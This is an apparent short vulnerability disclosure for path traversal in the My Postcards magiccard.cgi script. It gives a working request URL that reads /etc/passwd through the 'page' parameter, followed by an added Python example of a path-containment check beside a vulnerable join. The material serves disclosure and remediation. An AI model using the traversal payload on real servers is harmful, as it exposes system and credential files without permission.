My Postcards 5,6 vulnerability // magiccard.cgi
-----------------------------------------------

You can read any file on the server, regardless of the HTTP server
permissions set.
The file must be readable by the user running the HTTPD server.

http://www.xxxxxx.com/cgi-bin/magiccard.cgi?pa=preview&next=custom&page=../../../../../../../../../../etc/passwd

--
cult
simas@kalnieciai.lt
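
An added example (not from the original post or from the My Postcards code) of the containment check the `page` parameter needs before a file is opened, shown beside a path join that lacks it. The function names, the `templates` directory and the sample files are assumptions; the post does not show how magiccard.cgi builds the path.

```python
import os
import tempfile

class PageRejected(ValueError):
    """The requested page would resolve outside the template directory."""

def naive_page_path(template_dir, page):
    # Assumed vulnerable pattern: the parameter is appended to a directory as-is.
    return os.path.normpath(os.path.join(template_dir, page))

def safe_page_path(template_dir, page):
    # Reject NUL bytes and absolute paths before touching the filesystem.
    if "\x00" in page or os.path.isabs(page):
        raise PageRejected("illegal page name")
    # Resolve ".." and symlinks first, then require the result to stay under the base.
    base = os.path.realpath(template_dir)
    target = os.path.realpath(os.path.join(base, page))
    if target == base or os.path.commonpath([base, target]) != base:
        raise PageRejected("page escapes template directory")
    if not os.path.isfile(target):
        raise PageRejected("no such page")
    return target

def demo():
    # Constructed layout: <root>/templates/custom.html and <root>/secret.txt
    root = tempfile.mkdtemp()
    tdir = os.path.join(root, "templates")
    os.mkdir(tdir)
    files = {os.path.join(tdir, "custom.html"): "card",
             os.path.join(root, "secret.txt"): "s3cret"}
    for name, body in files.items():
        with open(name, "w") as fh:
            fh.write(body)
    results = {}
    for page in ("custom.html", "../secret.txt", "../../../../etc/passwd"):
        try:
            results[page] = safe_page_path(tdir, page)
        except PageRejected as exc:
            results[page] = "rejected: %s" % exc
    # The unchecked join walks out of templates/ to the sibling file.
    results["naive"] = naive_page_path(tdir, "../secret.txt")
    return root, tdir, results

if __name__ == "__main__":
    for key, value in demo()[2].items():
        print(key, "->", value)
```

The check runs on the resolved path rather than on the raw string, so it does not depend on spotting `../` in any particular spelling.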